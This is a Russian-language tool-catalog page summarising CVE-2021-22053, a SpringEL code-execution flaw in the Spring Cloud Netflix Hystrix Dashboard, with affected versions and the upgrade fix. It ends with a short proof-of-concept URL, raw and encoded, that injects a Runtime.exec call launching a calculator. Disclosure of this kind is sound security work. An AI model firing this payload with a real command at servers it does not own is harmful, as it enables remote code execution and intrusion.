Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 — Уязвимость разрешения шаблонов панели мониторинга Hystrix в Spring Cloud Netflix CVE-2021-22053 | Kitploit
Инструменты/GitHubGitHub/seccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийОбучение и Образование
GitHubseccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

Уязвимость разрешения шаблонов панели мониторинга Hystrix в Spring Cloud Netflix CVE-2021-22053

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
3783 лет назадПроверено Kitploit

CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard уязвимость разрешения шаблонов

Степень серьезности

Высокая

Поставщик

Spring от VMware

Описание

Приложения, использующие как spring-cloud-netflix-hystrix-dashboard, так и spring-boot-starter-thymeleaf, предоставляют способ выполнения кода, переданного в пути URI запроса во время разрешения шаблонов представлений. Когда запрос отправлен на /hystrix/monitor;[пользовательские данные], элементы пути после hystrix/monitor оцениваются как выражения SpringEL, что может привести к выполнению кода.

Затронутые продукты и версии VMware

Степень серьезности высокая, если не указано иное.

  • Spring Cloud Netflix
    • 2.2.0.RELEASE до 2.2.9.RELEASE
    • Более старые, неподдерживаемые версии также затронуты

Устранение

Пользователям затронутых версий следует применить следующее устранение: пользователям следует обновиться до 2.2.10.RELEASE+. Никаких других действий не требуется. Релизы, в которых эта проблема исправлена, включают:

  • Spring Cloud Netflix
    • 2.2.10.RELEASE+

Автор

Эта уязвимость была выявлена и ответственно сообщена threedr3am из лаборатории безопасности SecCoder ([email protected]).

Ссылки

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

История

2021-11-17: Опубликован первоначальный отчет об уязвимости.

POC

raw:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/

encode:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/

PS. Символ косой черты '/' не может быть передан в команде.

Скачать инструмент